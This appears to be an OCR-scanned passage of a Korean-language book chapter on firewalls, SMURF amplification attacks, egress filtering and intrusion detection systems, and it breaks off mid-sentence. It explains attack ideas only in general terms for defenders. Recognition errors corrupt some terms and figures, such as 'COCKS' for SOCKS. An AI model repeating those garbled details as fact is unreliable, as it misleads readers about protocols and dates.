ping 지 령 으로 접속확인해 본후 Web 싸이 트에 1，024개의 가장 락후한 망들의 명 단을 공개 
하였는데 거기에는 해당 IP 주소와 그 주소에 해당한 사람의 전자우편주소와 그와 관련한 
망이 올라 있었다. 가장 락후한 망들이란 단일 ping 지령에 대하여 가장 높은 수자의 대답 
을 보내온 즉 증폭효과가 가장 큰 망들을 의 미하였 다. 

여기서 보안문제는 원천 IP 주소를 위장하여 망으로 ping 요구를 보내기가 상당히 쉽 
다는것이다. 그리고 수신망이 응답할 때에도 초기 ping 지령이 출발한 원천지주소로 모든 
응답들이 오게 된다. 그림 11_1에서 보여 주는바와 같이 공격자들은 이 공정을 련속반 
복하여 최 종 수신자의 인 터네 트접 속에 범 람을 일 으킬수 있 다. 



그림 H-1. 공격자가 취약한 중간망을 통하여 위장된 
HNG 파케 트들을 망에 범 람시키 는 수법 

사실 상 공격 자들은 ISDN 접 속을 리 용하여 T 3(45 Mbit ) 접 속을 방해 할수 있 는 충분한 
전송량을 마련한 다음 여러개의 SMURF 증폭기망을 통하여 공격을 개시한다. 이러한 증 
폭을 허용하는 망이 있는 이상 그 망자체가 증폭문제를 가지고 있지 않다 해도 공격대상 
으로될수 있다. 또한 이러한 공격을 미리 막는데는 방화벽만한 보안체계는 없다. 

이러한 형태의 공격이 여러번 계속 진행되여 2000년 2월에 인터네트의 일부 인기싸 
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이 트들인 Yahoo , CNN , eBay 와 Amazon 등이 공격 을 받게 되 였 다. 

오늘 SMURF 증폭기 망을 검 색하여 그 결 과를 공개 적 으로 발표하는 Web 싸이트들은 
여러개가 있다. 저자는 20()1 년 3월 어느 한 회의에서 이러한 증폭기로 사용되지 않으면 
안되는 망들의 수는 20()1 년 1월까지 1,000배 이상으로 증가하였다고 강조하였다. 

이 공격들에서 찾은 흥미 있는 자료의 하나는 이 문제의 책임이 방화벽에 있는것이 
아니라 경로기에 있다는것이다. 그것은 정확하였다. 이러한 경우들에서는 설정이 잘못된 
인터네트경로기들이 문제의 기본요인이였다. 더우기 문제로 된것은 ping 형식의 이러한특 
정 공격 을 막기 위한 유일 한 방도라는것 이 망들을 인터네 트에 련결시키 는 모든 경 로기 들 
에서 하나의 파라메 터를 설정 하는것 이 였다. 이것 이 현재 RFC 2644/ BCP 34( 경 로기의 방향 
조정방송의 기 존값변경)에 서 권고되 는 기존값으로 되 였 다. 보안전문가들은 또한 RFC 
2827 /BCP 0038( 망진입려과: IP 원천주소위장을 리용한 봉사거부공격을 좌절시키는 방도)이 
라는 항목도 읽어 위장형공격에 대한 리해를 심화시켜야 할것이다. 

이러한 공격이 있은후 또하나의 흥미 있는 현상은 일부 보안전문두뇌들의 조언을 받 
아 대통령이 《전국정보체계보호계획》을 발표한것이다. 본 저자의 견해에는 이것이 누 
가 제일 웃단위에서 보안을 보며 누가 보안을 책임져야 하는가에 대한 확고한 실례로 된 
다고 본다. 즉 회 사의 리사회 와 최 고경 영 자가 책 임 져 야 한다는것 이 다. 

CNN , Yahoo , Amazon 과 같은 Web 싸이 트들은 모두 방화벽들을 가지고 있으나 이 공 
격 들을 막지 못하였 다. 따라서 방화벽기 술들에 는 어 떤것 이 있으며 그것 들은 어 떤 보안을 
제공하는가에 대하여 토론할 여지가 있다. 

방화벽기술에 대한 설명 


《 인터네트방화벽빈도질문대 답란》에는 방화벽 을 두가지 부류로 가를수 있다. 즉 망 
층방화벽 과 응용층방화벽 (응용대 리방화벽 혹은 대 리 라고도 부론다.)의 두가지 가 있 다. 이 
장에서는 정상상태검열방화벽들을 망층방화벽과 응용층방화벽의 혼용으로 정의하였다. 
그 목적 은 둘사이의 류사성 과 차이 점 을 쉽 게 리해 하기 위 해서 이 다. 


응용프로그람증 
표현 층 
대화층 
전송층 
망층 

자료련결층 
물리 층 


그림 11 一 2. OSI 7층모형 
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독자들은 이 미 OSI 층모형 에 익 숙하여 망층은 제 3층이고 응용층은 제7층이 라는것 을 
그림 11 一 2에서 볼수 있을것이다. 

방화벽 은 일종의 보안려 과장치 가 있으며 둘이 상의 망사이에 파케 트들을 주고받는 경 
토기로 간단히 묘사될수 있다. 

망층방화벽은 과케트려과장치 

종종 파케트러과방화벽은 접근명단을 가진 경로기로 되기도 한다. 가장 기초적인 형 
태로서 파케트러과방화벽들은 매 IP 파케트의 원천 IP 주소와 목적지 IP 주소 그리고 목적 
지포구에 기 초하여 전송자료들을 조종한다. 또한 파케 트러 과방화벽 은 들어 오는 대 면부 
(이 것 이 인 터네 트에 서 오는것 인가 아니 면 내 부망에 서 오는것 인가)에 기 초하여 파케 트검 
사도 한다. 또한 원천포구, 날자와 시간，규약형태 ( TCP , UDP , ICMP ) 와 기타 IP 선택사항 
에 따라 또 제품에 따라 IP 파케트조종도 할수 있다. 

파케트러 과방화벽 에 대 하여 잊 지 말아야 할것 은 우선 자체 로 매 개 IP 파케 트를 검 사 
하지만 IP 파케트들은 한 대화의 부분으로 보지 못한다는것 이 다. 또한 알아야 할것은 기 
존값으로 볼 때 많은 파케트러 과방화벽 들은 고장열 림식 설정값을 가지 고 있 다는것 즉 통 
과시키지 말라는 지령이 없는 한 파케트들을 통과시킨다는것이다. 마지막으로 또한 파케 
트의 HEADER 부분만 검열하고는 DATA 부분은 검사하지 않는다는것이다. 이것은 한 봉 
사안에서 다른 봉사를 런넬화하는것 과 갈은 기 법 들은 쉽 게 파케 트려 과를 우회할수 있 다 
는것 을 의 미 한다(표준 Telnet 포구 23이 닫겼을 때 방화벽 을 통해 포구 80으로 Telnet 를 가 
동시키 나 HTTP 포구 80은 열 려 있 다. 파케 트러 과장치 는 원천/목적 지 와 포구번호를 보기 만 
하기때 문에 그것으로 하여 그것은 통과한다.). 

왜 파케트려과방화벽을 리용하는가 일부 보안관리자들은 이것을 느낄수 있는데 그들 
의 망에는 파케트려과를 할수 있는 많은 장치들이 있을수 있다. 가장 좋은 실례는 여러 
가지 경 로기 들이다. 대 부분의 (다는 아니 지 만) 경 로기 들은 오늘 접 근명 단을 가지 고 있 으므 
로 자기를 통과하는 IP 전송을 여 러가지 정도의 보안으로 조종할수 있다. 많은 망들에서 
는 이것을 파케트러과방화벽으로 되게끔 설정만 해놓으면 되는 문제에 지나지 않는다. 
사실 모든 경로기들에 최소한의 접근목록을 장비시켜야 한다고 권고하고 싶다. 그것은 
경로기자체의 보안을 위해서도 좋고 주변장치들의 최소한의 보안을 위해서도 좋다. 파케 
트러과는 흔히 처리률에 영향이 없거나 매우 적다. 이것이 다른 기술에 비하여 또하나의 
리 로운 점 이 다. 마지막으로 파케트러과방화벽들은 거의 모든(모두는 아니지만) TCP / IP 형 
봉사를 지 원한다. 

왜 파케트려과방화벽을 리용하지 않는가 말하자면 그 방화벽들은 OSI 의 3계층에서 즉 
이 름그대 로 망계층에 서 작용한다. 파케트러 과방화벽 은 단일 IP 파케 트들을 검 사만 한다. 그 
파케 트들이 하나의 대 화의 일부인지 는 상관하지 않는다. 특히 기 본머 리 부정보(원천 및 
목적 IP 주소들과 갈은)만 일 없으면 파케트내용은 하나도 검사하지 않는다. 그러므로 파케 
트러과방화벽을 위한 그 어떤 규칙들을 만들어 내는것은 거의 불가능하고 어려우며 많은 
여 러 종류의 파케트러 과방화벽 들사이 에 일 관한 규칙 들을 유지 한다는것 은 더 욱 어 려 운것 
으로 보인다. 이미 언급하였지만 대부분의 경우 사고가 생기기 쉬운 기존값들은 위험한 
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것으로 보아야 할것 이 다. 

정상상태검사방화벽 

기 본적 으로 정 상상태 검 사방화벽 은 파케 트러 과방화벽 과 같다. 그러 나 파케 트러 과기 능 
이외에도 접속상태를 계속 감시하는 능력이 더 있다. 대화가 시작되였는가，현재자료전송 
(오든 가든)이 진행되고 있는가 아니면 종결되였는가를 동적으로 감시하는 방법으로 방 
화벽은 자료전송에 더욱 강력한 보안을 적용할수 있다. 또한 정상상태검사방화벽은 
HTTP, FTP, SMTP 와 같은 평판이 좋은 봉사도 한다. 이 마지막선택항목(이에 관해서는 
제 품별로 여 러 가지 가 있다.)들을 리용하면 전송흐름을 《 분석》하여 망상의 호스트의 
TCP 포구 80 으로 HTTP 전송흐름이 가는가 가지 않는가를 실지로 검사할수 있게 된다. 이 
때 호스트체계의 TCP 포구 80 으로 가고 있으므로 파케트려과장치는 이것이 HTTP 전송흐 
름이 라고 단정할뿐이 다. 정 상상태검 사가 부분적 으로 진행 되 므로 파케 트의 자료부분을 실 
지 검사할 방도가 없는것이다. 

정 상상태검 사방화벽 은 대 화의 개 시，통신，종결을 리해하는 능력 을 가지 고 있다. 정 
상상태 검 사방화벽 은 고장닫김식 기 존설 정값을 가지 고 있 다. 그것 은 이 방화벽 이 파케 트들 
을 어떻 게 처 리 해 야 되는지 모르면 그 파케 트를 통과시키지 않는다는것을 의 미한다. 이 
외에도 이 방화벽불은 파케트려과기에 비해 볼 때 파케트와 대화안의 실지내용(자료자 
체 )을《 리 해》함으로써 추가적 인 보안수준을 보장할수도 있 다. 이 마지 막의 것 은 특정한 
봉사에 서만 적 용되 는데 제 품별 로 다를수 있 다. 

왜 정상상태검사방화벽을 리용하는가 정 상상태검 사방화벽 들은 성 능이 높으며 파케 트 
려과방화벽보다 더 많은 보안기능들을 가지고 있다. 이러한 보안특성들을 가지고 일반봉 
사와 인기 봉사를 특별 히 조종할수 있게 된 다. 정 상상태 검 사방화벽 은 파케트러 과장치 와 
마찬가지 로 거의 모든(전부는 아니 고) 봉사들을 투명하게 지 원한다. 그러므로 의뢰기설정 
을 변경시키거 나 보충적 인 쏘 프트웨 어 를 추가하여 이 방화벽 을 가동시 킬 필요는 없다. 

왜 정상상태검사방화벽을 리용하지 않는가 정 상상태검 사방화벽 들은 응용프로그람준위 
의 방화벽 과 같은 보안수준을 제 공하지 못할수도 있 다. 이 방화벽 은 파케트러 과장치 와 
마찬가지로 봉사기와 의뢰기가 서로《직접》대화하게 한다. 만약 방화벽이 자기를 통 
과하는 파케트들의 자료부내용을 어 떻게 해석할지 모르는 경 우에는 이것 이 큰 보안위 험 
으로 될 수 있 다. 특히 불안케 하는것 은 많은 사람들이 응용준위방화벽 에 비해 볼 때 이 
정상상태검사방화벽을 틀리게 설정조작하기 쉬운것으로 잘못 생각하고 있는데 있다. 그 
것 은 파케트러 과장치 와 정 상상태 검 사방화벽 이 거 의 모든(모두가 아니 라) 봉사들을 투명 
하게 지 원 하는 반면 에 봉사준위방화벽 은 제 한된 수의 봉사만 지 원 하며 비 지원성봉사와 
작업 하기 위하여 의뢰기쏘프트웨어 에 대 한 변경을 요구하는것과 관련된다. 

Netcook Associates 에서 발표한 백서에서 Computer Security Institute 는 다음과 같이 말 
하였다. 《 위험한 봉사형태 들이 방화벽 을 통과하게끔 정상상태검사방화벽들을 설정하는 
것은 가능할뿐아니 라 사실 사소한것 이 다. …응용대 리방화벽들은 설계상 설정오유가 나기 
매우 힘들게 되여 있다.》 

물론 설정이 정확히 되지 않으면 어느 체계도 안전하지 못하다는것은 너무나도 응당 
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하다. 

사실 사람의 실수와 착오가 보안문제의 첫번째，두번째，세번째 리유이다. 맞지요? 

응용프로그람준우 I 방화벽 

응용프로그람준위 방화벽 (즉 대 리 자)은《 중간다리》의 역할을 하는데 여기서는 의뢰 
기가 대리자에게 자기를 대신하여 그 어떤 과제를 수행할것을 요구한다. 이러한 과제들 
로서 는 Web 페 지가져 오기，우편보내 기 , FTP 를 리 용하여 파일 을 복원하기 등의 과제 들이 
다. 대 리 자들은 응용에 따라 다르다. 즉 사용될 특정한 용도(즉 더 정 확히 보면 응용프로 
그람준위 규약)를 지원한다는 뜻이다. 일반적인 대리자기능들에도 표준이 있는데 가장 
인기 있는것 은 COCKS 이 다. COCKS 는 원래 데 이 비드코블라스가 기 안하여 작성 하고 NEC 
사가 더욱 발전시 킨것 이 다. COCKS 를 지 원하는 응용프로그람들은 역시 COCKS 표준을 지 
원하는 방화벽들을 통과할수 있게 될것이다. 

정 상상태검 사방화벽 과 류사하게 응용준위방화벽 의 일 반기 존값들은 고장닫김 식 즉 어 
떻게 처 리 해 야 할지 모르는 파케트나 대화들은 다 닫아 버리게 되 여 있다. 

왜 응용프로그람준위방화벽을 리용하는가 우선 방화벽들은 일차적으로 매우 제한된 
수의 봉사만 지원한다는 단순한 사실에 기초하여 높은 수준의 보안을 제공한다. 그러 
나 응용준위방화벽 은 모든(모두가 아니 고) 보통 봉사들을 일상적 으로 지 원한다. 그것 들 
은 응용층에 서 의 규약을 리해하며 그렇 기때 문에 규약의 일부를 막아 버 릴수 있 다 (FTP 
를 리용하여 파일 을 접 수하게 하나 FTP 를 실례 로 하여 파일받기 를 부정 하기 도 한다.). 
방화벽은 또한 방화벽판매 업 체와 방화벽관본에 따라 취 약점 들을 람지 하고 막아 치울수 
있 다. 

또한 의뢰기 와 봉사기 사이에는 직 접적 인 접촉이 진행되는것 이 없다. 그러 나 방화벽 
은 의뢰기 와 봉사기 에 대 한 모든 요구와 응답을 다 처 리 할것 이 다. 대 리 자 ( proxy ) 봉사기 인 
경 우 사용자인증도 쉬 우므로 많은 보안실 천 자들은 응용준위방화벽 들에 서 진행 되 는 많은 
기록들이 얼마나 도움이 되는가를 알아야 할것이다. 

성 능상 리유로 하여 많욘 응용준위방화벽 들은 또한 자료를 완충하여 더 빠른 반응 
시 간과 더 높은 처 리률을 제 공함으로써 가령 흔히 접 속되 는 Web 폐 지 에 접 속하게 할수 
있다. 필자는 방화벽이 이런 작업을 하는것을 권고하지 않는바 그것은 방화벽이 전송 
흐름의 검 사를 진행하여 더 높은 보안상태 를 유지해 야 하기때 문이 다. 대 신 보안실 천 자 
들은 일 반 Web 싸이트접 속시 성 능향상을 위하여 자립 형캐 쉬대 리 자봉사기 를 리용하는것 
을 고려해 보아야 할것이다. 이러한 자립형캐쉬대리자봉사기에 보충적인 내용보안을 
마련 하여 줌으로써 내 용과 기 타 문제 에 기 초하여 Web 싸이트접 근을 조종하게 할수 있 
을것 이 다. 

왜 응용준위방화벽을 리용하지 않는가 설계상 응용준위방화벽은 제 한된 수의 봉사를 
지원하게 되여 있다. 다른 응용프로그람/봉사/규약을 지원하는것이 필요한 경우 응용프로 
그람을 바꾸어 응용준위방화벽 을 뚫고 나가게 해 야 한다. 방화벽 과 같은 높은 수준의 보 
안이 주어 진 조건에서는(설정에 기초하여) 파케트러과방화벽이나 정상상태 검사방화벽에 
비해 볼 때 이 방화벽 은 성 능에 매 우 부정 적 인 영 향을 줄수 있 다. 
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시장이 바라는것과 시장에 실지 필요한것 

많은 방화벽제품들은 이러한 기술들을 서로 결합하여 간단하면서도 쓰기 쉬운것으로 
만든 제품인것 갈다. 방화벽들은 완성품인도방식인 《열쇠넘겨주기》혹은 《일체식》방 
식으로 진행되고 있다. 전원을 투입하고 켜면 설정이 다 되는 식의 방화벽보안에 대해서 
는 필자자신도 그닥 믿지 않고 있다. 게 다가 YPN , 항비루스，내용보안/려과，전송자료형 
성 등의 류사한 기 능들이 다 집 적된 일체식 대 안도 역 시 필 자자신은 그닥 믿 고 싶지 않다. 
사실 방화벽들은 말단사용자에게 설정，사용，리해가 쉽게 되자면 더 복잡해야 하는것이 
상례 이다. 제품의 코드개수는 늘어 나며 제품의 보안취약성의 가능성도 기하급수적으로 
높아 지므로 이것은 응당하다. 

필자의 의견으로는 방화벽 은 망에서 《 검 은통》으로서 대부분의 사용자들은 볼수도， 
알수도 없어야 한다. 사용자들은 그것이 거기에 있다는것도 몰라야 한다. 

시장은 무엇이 필요하다는것을 안다. 그렇기때문에 판매업체들은 바로 그것을 제공 
한다. 그러나 시장에 무엇이 필요한가를 언제나 알고 있는가. 바로 이 문제가 보안전문가 
들이 언제 나 우선시 해 야 할 문제 이 다. 즉 보안리해 와 보안의 식 을 가르쳐 주는것 이 필요 
하다. 

방화벽기술의 간단한 개팔 

간단히 말해 서 파케트러 과장치 는 가장 낮은 수준의 보안을 제 공하나 가장 높은 처 리 
률을 보여 준다. 보안선택 사항과 특성 적기능들은 제 한되 여 있고 망에 수많은 파케 트려 과 
장치 들이 있 으면 관리 하기 어 려울수 있 다. 

정 상상태검 사방화벽 의 보안수준은 보다 높지 만 파케 트려과기만큼한 처 리률이 나오지 
못할수 있 다. 판매 되 고 있 는 주요방화벽 들은 오늘 정 상상태검 사방화벽 으로서 이 것 들은 
대 개 보안，관리 능력，처 리률, 투명한 집 적 도를 다방면적 인 환경 에 맞게 잘 결 합시킨것 으 
로 본다. 

응용준위방화벽 들은 보안수준은 가장 높지 만 다른 두 방화벽기 술들에 비해 볼 때 처 
리률은 대체로 그것보다 못하다. 

어쨌든 보안전문가들은 절대로 방화벽자체가 보안을 잘 제공할것이라고 믿지 말아야 
한다. 그리고 회사가 어떤 방화벽 을 배비하였던지 관계 없이 설정 을 잘해 놓지 않으면 보 
안을 보장하지 못할것 이 다. 그러 자면 상당한 일을 해 야 할것 이 다. 

울타리방어에 어떻게 방화벽들들 일치시키겠는가 


사람들은 흔히 해커들은《저멀리》인터네트에 있다고 생각하지 자기의 동료들중 그 
누군가가 내부적이든 외부적이든 비법적인 행동을 하리라고는 전혀 생각하지 못하는것 
같다. 그러 나 가슴 아프게 도 모든 콤퓨터관계범죄의 50%가 내부종업 원들이 감행한것 이 
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라는것을 보여 주는 통계자료가 있다. 

그렇기때문에 방화벽보안과 그 주변환경의 작용에는 두가지가 있다고 설명할 필요가 
있다. 인터네트상의 해커들이 내부망에 들어 오지 못하게 해야 하며 내부망에 있는 사람 
들이 외부망으로 기밀자료들을 보내지 못하게 해야 한다. 내부에 들어 오지 못하게 하는 
것은 쉬우나 안에서 밖으로 나가지 못하게 설정하는것은 매우 힘들다. 이러한 실례로 필 
자가 얼마전에 인터네트침투시험을 진행하였을 때 어떤 일이 일어 났는가를 보기로 한다. 

출구려과를 못한 경우 

의뢰기는 인터네트에 련결된 간단한 방화벽환경을 가진 산업의뢰기였다. 그들은 보 
안수준을 높이 려고 외부자원들을 리용하여 자기들이 가지고 있던 인터네트경로기를 파케 
트러 과기 로 작용하게 끔 설정 해 놓았다. 게 다가 인터 네 트경 로기 안쪽에 는 정 상상태 검 사방 
화벽 이 있 어 내 부망과 련결되 여 있 었 다. 그들은 정 상상태검 사방화벽 의 비 무장지 대 ( DMZ ) 
에 있는 항비루스 ( AV ) 전자우편관문과 인터네 트사이 에서 전자우편 ( SMTP , TCP 포구 25) 만 
오갈수 있게 경 로기 와 방화벽 을 설정해 놓았었 다. 항비 루스전자우편관문은 들락날락하는 
모든 전자우편들을 검 사한후에 야 내 부망에 있는 사람이 든 인 터네 트에 있는 사람이 든 최 
종접 수자에 게 넘 겨 주군 하였 다. 경 로기 는 놀랄 정 도로 잘 설정 되 여 있었다. 들어 오는 
접 근목록은 극도로 엄 격하여 들어 오는 SMTP 를 TCP 포구25에만 돌려 주게 되 여 있 었 다. 
정 상상태검 사방화벽 의 경 우도 마찬가지 였 다. 

SMTP 항비 루스전자우편관문에 대 한 검 사를 하던중 필 자는 취 약성 을 찾기 위하여 항 
비 루스전 자우편관문의 SMTP 접 속구에 접 속할 때 마다 그 접 속구도 대 신 SMTP 접 속개 시기 
발과 함께 Windows NetBIOS 요구신호를 맞받아 보내 오는것을 갑자기 발견하게 되 였다. 


우편 봉사기 



그림 11-3. 경로기와 방화벽에서 출구려과를 하지 못하는 경우 
중요한 정보가 비법사용자들에게 공개될수 있다. 


이 단순한 사실은 허가 받지 못한 비법적인 사람에게 많은 정보를 루설하여 준다(그 
림 11 一 3을 볼것 ). 첫 째 로，인 터네 트경 로기 와 방화벽 두곳에 서 모두 출구려 과가 분명 히 
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없다는것이다. 이것은 내부체계(최소 DMZ 에 있는 이 기계)들이 외부망과 TCMP 상에서 
NetBIOS 통신을 할수 있다는것을 명백히 보여 준다. 여러가지 측면에서 이것은 매우 위험 
하다. 둘째로， DMZ 에 있는 항비루스전자우편관문에 NetBIOS 가 설치되여 있는데 그것은 
고도의 보안환경에 Windows 봉사기설치에서 권고된 규정을 제대로 지키지 않았다는것을 
보여 준다. 셋째로，이 체계를 리용하여 DMZ 나 다른 망(내부망까지 포함하여)에 쉽게침 
투할 가능성 이 높다는것 이 다. 그것 은 NetBIOS 가 동일 한 사업그롭이 나 령 역 에 있는 원도 
우즈를퓨터사이 의 중심 에 서 통신에 사용되 고 있기 때 문이 다. 

이것 이 인터네트침투시험을 하는 과정 에 필자가 대체 로 느낀 점들이 다. 물론 비 법적 
인 사람이 우선 DMZ 에 있는 봉사기로 뚫고 들어 가야 하지만 그것도 생각보다는 훨씬 
쉽 다. 

어떻게 이런 정보류실을 막겠는가 보안관리자들은 외 부망에 련결된 모든 방화벽 과 경 
토기들이 정확히 설정되여 《위험하다》고 생각되는 봉사형태들과 외부망 특히 인터네트 
상의 호스트들에 리용되 지 않게 되 여 있는 봉사들을 모두 차단하게 끔 해 야 할것 이 다. 

일 반적 으로 보안관리자들은 현지 에 서 리용하지 않는 봉사기 들과 체 계 들이 그 어 떤 
방법 으로라도 절대 로 인터네트에 접속하지 못하게 해 야 한다. 이 렇게 되여 야 보안이 상 
당히 높아 져 비루스나 트로이목마와 같은 적 대적코드들이 외부망의 비 법분자와 련계를 
직접 맺지 못하여 체계의 통제권을 넘겨 주지 못할것이다. 

이것은 방화벽 DMZ 에 있는 체계들에도 마찬가지이다. DMZ 에는 사용자인증이 전혀 
없이도 외부에서 접근을 쉽게 할수 있는 체계들이 많다. 여기에서 기억해야 할 중요한것 
은 누가 체 계접속을 초기 에 시 도하는가 하는것 이 다. 

만일 외부체 계 가 DMZ 에 있는 우편 봉사기의 TCP 포구 25( SMTP ) 로 접속을 해 오면 이 
것이 들어 오는 전자우편이기때문에 정상이다. 만일 DMZ 에 있는 우편봉사기가 외부체계 
의 TCP 포구 25 로 접 속해 오면 이 것도 밖으로 나가는 전자우편을 위한것 이 므로 역 시 정 
상이다. 그러나 우편봉사기의 유일 한 목적이 인터네트와 전자우편을 주고받는것뿐이라면 
방화벽과 지어 경로기도 그에 맞게 설정되여야 한다. 

관리 를 쉽 게 하기 위하여 많은 사람들은 인터네 트에서 직 접 자기 봉사기들을 판본갱 
신하고 있다. 일부 사람들은 지어 직접 봉사기에 틀고 앉아 그 어떤 제한이나 경계선도 
없 이 월드 와이 드 Web 을 올리흙고 내 리흙고 하고 있다. 이 렇게 하면 봉사기 에 보안상 
큰 위험 으로 되며 주변환경에도 나쁜 영향이 미친다. 그것은 우선 트로이목마가 체계 에 
침습해 올수 있고 다음으로 봉사기들이 동일한 물리적/론리적망에 있는것외에 다른 그 
어떤 공통적인것이 없음에도 불구하고 동일한 사용자이름과 통과암호를 가질수 있다는 
점 으로 보아 그것은 위험한 일 이 다. 

엔 쏘니 씨 . 즈보랠 스키 가이 우스는 잡지 Phrack Magazine 에 실 린 자기 의 글《 당신 이 
죽은후 Cisco 땅에서 해야 할 일》에서 이렇게 말하였다. 

《나는 보안을 신뢰하지 않은지 오래다. 보안문제의 핵심은 우리가 신뢰를 신뢰하고 있 
는데 기 인된다(켄 통슨의 글 <신뢰를 신뢰하는데 대 한 회*令를 읽으라). 내가 보안을 믿는 
다면 그때에는 침투시험결과를 팔아 버리겠다.》 
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높은 보안상태와 쉬운 관리사이에 론리적관계가 있다고는 절대로 볼수 없으며 또 있 
을수도 없다. 보안은 어려우며 또 앞으로도 어려울것이다. 

체계와 망들 침식하는 일반오유들 

보안전문가들은 흔히 《망이 란 외부에서 보면 딴딴하고 내부에서 보면 만문하다.》 
고 말하는데 필자는 이 말에 전적으로 동의한다. 항상 부딪치군 하는 약점들중 일부를 
아래에 소개한다. 

• 원격접근봉사기 ( RAS ) 가 내부망에 련결되면 사용자이름과 통과암호를 가지자마 
자 침입자들이 마치도 내부사용자처 럼 그 망에 접근할수 있다. 

• 접근명단과 기타 보안대책들은 WAN 경로기와 망에서 실행되지 않는다. 자그마 
한 지역사무실들은 흔히 물리적보안수준이 낮으므로 사무실에 침습하기 더 쉬우 
며 전체 망에 심각한 위험을 조성할수 있다. 

• 많은 봉사형 태 들은 기 존값설 치방식 들이 있으므로 그것 으로 하여 취 약성 을 가진 
다. 설치표준경로，파일 및 디렉터리허용과 갈은 알려 진 약점들이 있어서 누구 
나 다 완전한 통제권을 가질수 있게 되여 있다. 

• 종업원들은 서면으로 된 통과암호방책을 지키지 않으며 통과암호방책은 사용자(실 
지 사람들)들을 념 두에 두었지 일 반체 계 계 산부를 념 두에 두고 작성하지 않는다. 

• 여 러 체 계 들에는 쓰지 도 않는 여 러 가지 불필 요한 봉사형 태 들이 가동하고 있 다. 
이러한 봉사형태들을 리용하여 해당 체계나 망전체에 대한 봉사거부공격 ( DoS ) 을 
할수 있다. 

• 봉사응용프로그람들에는 관리 자특권이 있고 관리 자들의 통과암호도 기 존값에 서 
거의 변경되지 않고 있다. 실례로 프로그람의 사용자이름과 통과암호가 그 프로 
그람이 름과 득 같은 예 비본프로그람도 있 고 계 산부에 기 존값으로 관리 자특권도 
있다. 인터네트에 있는 기존값사용자이름/통과암호들의 일부를 보라. 거기에는 
수많은 서로 다른 체계에 기존값사용자이름과 통과암호가 수백개나 있다. 

• 회 사들은 인증체 계 를 확고히 믿고 그것을 비 법접근을 막는 유일한 방패 로 사용 
하고 있다. 많은 회사들과 사람들은 각이한 체 계접근시 해커들에 게 사용자이름 
과 통과암호가 필요조차 없다는데 대하여 모르고 있다. 몇초안에 체계전반을 장 
악할수 있 는 그러한 취 약점 들이 있 다는것 을 모르고 있 는것 같다. 

일부 보안전문가들은 이러한 문제들의 대부분은 해소될수 없는 문제라는것을 깨닫게 
될것이다. 또한 이 문제들을 잘 알고 전문가들은 이러한 문제들을 해결하거나 제거하기 
위하여 끊임 없 이 노력해 야 할것 이 다. 

《 침투시 험 을 칠 때 흔히 어 떻게 우리 방화벽을 뚫고 들어 오시렵 니까?》，《 당신은 
이런저런것을 하면 안됩니다.》라는 질문과 통보문을 보게 된다. 무엇보다먼저 침투시험 
에서는 방화벽을 뚫는것이 아니라 방화벽을 에돌아 간다. 방화벽을 뚫는 그자체는 많은 
기법들을 필요로 하지만 그것을 소유한 회사에는 큰 해가 없다. 둘째로，해커들은 공격대 
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상회사의 규정 이든 나라의 규정 이든 그 어 떤 규정 도 준수하려 하지 않는다. 

경영진의 워크스테이션들에서의 보안은 어떠한가 회사들은 흔히 인 터 네트련결환경과 

자기의 내부봉사기들에 극도로 엄격한 보안조치를 취한다. 그러나 이 보안상태가 높은 
체계들을 관리하는데 리용되고 있는 워크스테이션들을 안전하게 하는 사업은 그들이 잊 
고 있든지 아니면 소홀히 하고 있다. 어느 한 인터네트은행의 보안검사를 최근에 해보는 
과정에 필자는 방화벽들과 침입 탐지체계들, 대 리자들과 그에 투하된 기 타 장비들을 감명 
깊게 보게 되 였다. 좀 더 깊이 검사해 보는 과정에 발견하게 된것은 보안성 이 높은 체계 
에 대한 관리기를 그들의 내부망에 위치한 특정워크스테이션으로 한다는것이였다. 이 모 
든 워크스테이션들(망관리자들의 《 소유》인)은 다소 기정값설정으로 즉 사용자이름과 
통과암호 ， SNMP 등의 봉사형 태 들을 기 정값으로 하여 여 러 가지 조작체 계 들을 기 동시 키 고 
있었다. 이 모든 워크스테이션들은 망상에서 평범한 사용자기계들과 막 섞여 있었다. 이 
관리를퓨터접근에는 사용자이름/통과암호이외에는 더 다른 제한조건들이 없었다. 지어 내 
부콤퓨터들사이 에는 명명관례까지 있어서 어느 콤퓨터 가《기간체계관리용콤퓨터》로 리 
용되고 있는가 하는것까지 쉽게 알수 있게 되여 있었다. 이러한 워크스테이션들을 먼저 
뚫고 들어 갔으므로(트로이 목마, 물리 적접 근，기 타 방법 으로) 기 간체 계 에 접 근하는데 는 
얼마 시간이 걸리지 않았다. 

침입탐지체계와 방화벽 

최 근 자기 들의 망에 침 입 검 출체 계 ( IDS ) 를 설 치하는 회 사들이 점 점 더 많아 졌 다. 이 
분야도 실수하기 쉬운 분야이 다. 우선 IDS 는 해커들로부터 회사의 보안을 지켜 내지 못 
한다. 공격을 더 잘 람지하여 문건에 기록할수도 있지만 많은 경우 공격을 막지는 못한 
다. IDS 는 기 록을 광범하게 하고 자동 및 수동분석 을 잘하는 체 계，일정하게 파악 있는 
체계라고 하는것이 좋을것이다. 

얼마전에 누군가가 방화벽이 공격을 막는 식으로 자동적으로 여러가지 공격을 막거 
나 다른 체 계 들을 다시 설 정할수 있 는 IDS 를 만들 기 발한 착상을 들고 나온적 이 있 었 다. 
위 장공격방법(요즘 매우 쉬운 방법 으로 됨)으로 해커들은 믿음직한 계3자로부터 시 작되 
는 허위공격을 진행하여 회사와 그 신뢰성 있는 원천(즉 제3자)사이의 통신을 모두 막아 
버린다. 그리하여 이러한 자동화된 체계에 대한 착상이 좋은 생각이 못된다는것을 모든 
사람들이 즉시 깨닫게 되였다. 

일부 IDS 들은 서명형 이 나 일부는 변칙형들이다. 일부 IDS 들은 량자를 선택할수 있게 
되여 있고 호스트나 망에 기초한것도 있다. 그리고 물론 망에 배비한 IDS 장치들에 대한 
작업기록과 관리를 맡아 수행하는 중앙조종탁도 있다(이 러한 중앙조종탁보안은 어느 정 
도인가). 


• 문제 1 . 서명형탐지체계는 크든작든 특정한 자료형태들에 기초하여 공격을 람지 
하게 된다. IDS 가 아는 형 태 들을 우회하는 방법 을 해 커 들이 알기 때 문에 요즘에 
는 이것을 우회하는것은 더 쉬워 지고 있다. 

• 문제 2. 대부분의 IDS 들은 수신하는 체계 가 보내오는 자료들에 어 떻게 대 응하는 
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지 모른다. 즉 IDS 들은 공격을 보지만 공격 이 성공적 인것인지 아닌지 하는것은 
모른다. 그렇다면 IDS 가 어떻게 공격들을 분류하며 어떻게 공격의 성공성여부를 
분석 하겠는가. 

• 문제 3. IDS 는 믿지 못할 정도로 허위경보를 내군 한다. 그렇다면 어느 경보는 
